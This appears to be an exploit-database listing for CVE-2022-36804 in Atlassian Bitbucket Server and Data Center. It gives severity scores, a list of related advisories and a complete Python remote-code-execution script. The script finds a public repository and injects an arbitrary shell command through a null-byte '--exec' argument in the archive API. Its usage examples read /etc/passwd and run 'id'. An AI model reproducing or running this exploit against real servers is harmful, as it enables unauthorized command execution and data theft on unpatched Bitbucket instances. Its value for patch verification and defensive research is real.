Lucene search
Khal4n11337DAY-ID-38290HistoryMar 23, 2023 - 12:00 a.m.
Bitbucket v7.0.0 - Remote Code Execution Exploit
2023-03-2300:00:00
khal4n1
0day.today
142
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.971 High
EPSS
Percentile
99.7%
# Exploit Title: Bitbucket v7.0.0 - RCE
# Exploit Author: khal4n1
# Vendor Homepage: https://github.com/khal4n1
# Tested on: Kali and ubuntu LTS 22.04
# CVE : cve-2022-36804
#****************************************************************#
#The following exploit is used to exploit a vulnerability present
#Atlassian Bitbucket Server and Data Center 7.0.0 before version
#7.6.17, from version 7.7.0 before version 7.17.10, from version
#7.18.0 before version 7.21.4, from version 8.0.0 before version
#8.0.3, from version 8.1.0 before version 8.1.3, and from version
#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
#Usage Example
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
#The server will send a 500 http response with the stout output from the
# command executed.
#****************************************************************#
#!/usr/bin/python3
import argparse
import urllib
from urllib import request
import re
#argument setup
parser = argparse.ArgumentParser(description='Program to test
bitbucket vulnerability CVE-2022-36804')
parser.add_argument("--url", help="Set the target to attack.
[REQUIRED]", required=True )
parser.add_argument("--cmd", help="Set the command to execute.
[DEFAULT ID]", required=True, default='id')
args = parser.parse_args()
cmd= urllib.parse.quote(args.cmd)
#reads from the public repository what is available
requ = request.urlopen(args.url+ "/repos?visibility=public")
response = requ.read()
#select a public project and stores it in a variable
project = re.findall('7990/projects/(.*)/repos/',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]
#Selects a public repo and stores it in a vatiable
file = re.findall('/repos/(.*)/browse',
str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]
# Exploitation
try :
attack = request.urlopen(args.url +
"/rest/api/latest/projects/" + project + "/repos/" + file +
"/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
print (attack.response())
except urllib.error.HTTPError as e:
body = e.read().decode() # Read the body of the error response
print (body)
Related
prion
prion
Design/Logic Flaw
2022-08-25 06:15:00
nessus
nessus
Atlassian Bitbucket RCE (CVE-2022-36804)
2023-02-09 00:00:00
thn
thn
githubexploit
githubexploit
Exploit for CVE-2022-36804
2022-09-19 13:15:13
Exploit for CVE-2022-36804
2022-09-07 09:35:49
Exploit for Command Injection in Atlassian Bitbucket
2022-09-19 12:46:33
hivepro
hivepro
RCE flaw resides in the Atlassian Bitbucket Server and Data Center
2022-09-01 10:53:55
atlassian
atlassian
Critical severity command injection vulnerability - CVE-2022-36804
2022-08-17 22:40:01
checkpoint_advisories
checkpoint_advisories
Atlassian Bitbucket Command Injection (CVE-2022-36804)
2022-10-31 00:00:00
malwarebytes
malwarebytes
Actively exploited vulnerability in Bitbucket Server and Data Center
2022-10-03 12:00:00
packetstorm
packetstorm
Bitbucket 7.0.0 Remote Command Execution
2023-03-24 00:00:00
Bitbucket Git Command Injection
2022-09-22 00:00:00
cve
cve
CVE-2022-36804
2022-08-25 06:15:00
cnvd
cnvd
Atlassian Bitbucket ServerεData Centerε½δ»€ζ§θ‘ζΌζ΄
2022-08-31 00:00:00
metasploit
metasploit
Bitbucket Git Command Injection
2022-09-19 22:28:17
cisa_kev
cisa_kev
Atlassian Bitbucket Server and Data Center Command Injection Vulnerability
2022-09-30 00:00:00
nuclei
nuclei
Atlassian Bitbucket - Remote Command Injection
2022-09-19 22:05:26
zdt
zdt
Bitbucket Git Command Injection Exploit
2022-09-23 00:00:00
exploitdb
exploitdb
Bitbucket v7.0.0 - RCE
2023-03-23 00:00:00
rapid7blog
rapid7blog
Recog Release v3.0.3
2023-01-12 14:20:03
CVE-2022-36804: Easily Exploitable Vulnerability in Atlassian Bitbucket Server and Data Center
2022-09-20 15:14:26
Metasploit Weekly Wrap-Up
2022-09-23 18:50:37
attackerkb
attackerkb
CVE-2022-36804
2022-08-24 00:00:00
trellix
trellix
The Bug Report β August 2022 Edition
2022-09-07 00:00:00
The Bug Report β August 2022 Edition
2022-09-07 00:00:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.971 High
EPSS
Percentile
99.7%
Related for 1337DAY-ID-38290